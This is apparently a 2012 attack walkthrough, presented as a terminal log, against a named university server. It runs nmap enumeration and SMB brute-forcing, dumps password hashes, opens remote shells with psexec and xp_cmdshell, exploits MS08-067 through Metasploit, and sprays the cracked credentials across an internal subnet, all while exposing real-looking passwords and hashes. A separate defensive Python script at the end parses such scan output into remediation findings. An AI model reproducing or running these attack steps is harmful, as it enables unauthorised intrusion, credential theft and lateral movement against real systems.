Guangxi Normal (广西师范) website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and execute a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole    // exploit the MS08-067 vulnerability on the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
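Added here as a defender-side example, not part of the original post: a small Python triage script that reads "Host script results" blocks in the shape the smb-enum-shares, smb-brute and smb-check-vulns outputs above take (anonymous share access, accepted blank or weak passwords, an unpatched MS08-067) and turns them into severity-rated findings for remediation. The host, share and credential values in the embedded sample are constructed for the example.

```python
import re
# Constructed sample shaped like the "Host script results" blocks that nmap's
# smb-enum-shares, smb-brute and smb-check-vulns scripts print (values made up).
SAMPLE = """\
Nmap scan report for lab-host (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:Password1 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def parse_host_scripts(text):   # yields (host, script, body) per host-script result line
    host, script, in_block = None, None, False
    for raw in text.splitlines():
        m = re.match(r"Nmap scan report for (?:\S+ \()?([\d.]+)\)?", raw)
        if m:
            host, script, in_block = m.group(1), None, False
        elif raw.startswith("Host script results:"):
            in_block = True
        elif in_block and raw.startswith("|"):
            body = raw.lstrip("|_ ").strip()       # drop the "| " / "|_ " tree prefix
            if re.fullmatch(r"[\w-]+:", body):      # "| smb-brute:" opens a script block
                script = body[:-1]
            elif body:
                yield host, script, body
        else:
            in_block = False                        # "Nmap done:" etc. closes the block

def triage(text):   # maps the NSE output to (host, severity, finding) tuples
    findings, share = [], None
    for host, script, line in parse_host_scripts(text):
        if script == "smb-enum-shares":
            if not line.startswith("Anonymous access:"):
                share = line                        # a bare line names the share that follows
            elif (level := line.split(":", 1)[1].strip()) != "<none>":
                findings.append((host, "HIGH", f"share {share} allows anonymous {level}"))
        elif script == "smb-brute" and line.endswith("=> Login was successful"):
            user, _, password = line.split(" => ", 1)[0].partition(":")
            sev = "CRITICAL" if password == "<blank>" else "HIGH"
            findings.append((host, sev, f"guessable SMB password for account {user}"))
        elif script == "smb-check-vulns" and line.endswith(": VULNERABLE"):
            findings.append((host, "CRITICAL", f"{line.split(':')[0]} unpatched"))
    return findings
```

Feed it the saved output of `nmap --script=smb-enum-shares,smb-brute,smb-check-vulns` over an internal range and the findings list is the patch and password-reset worklist.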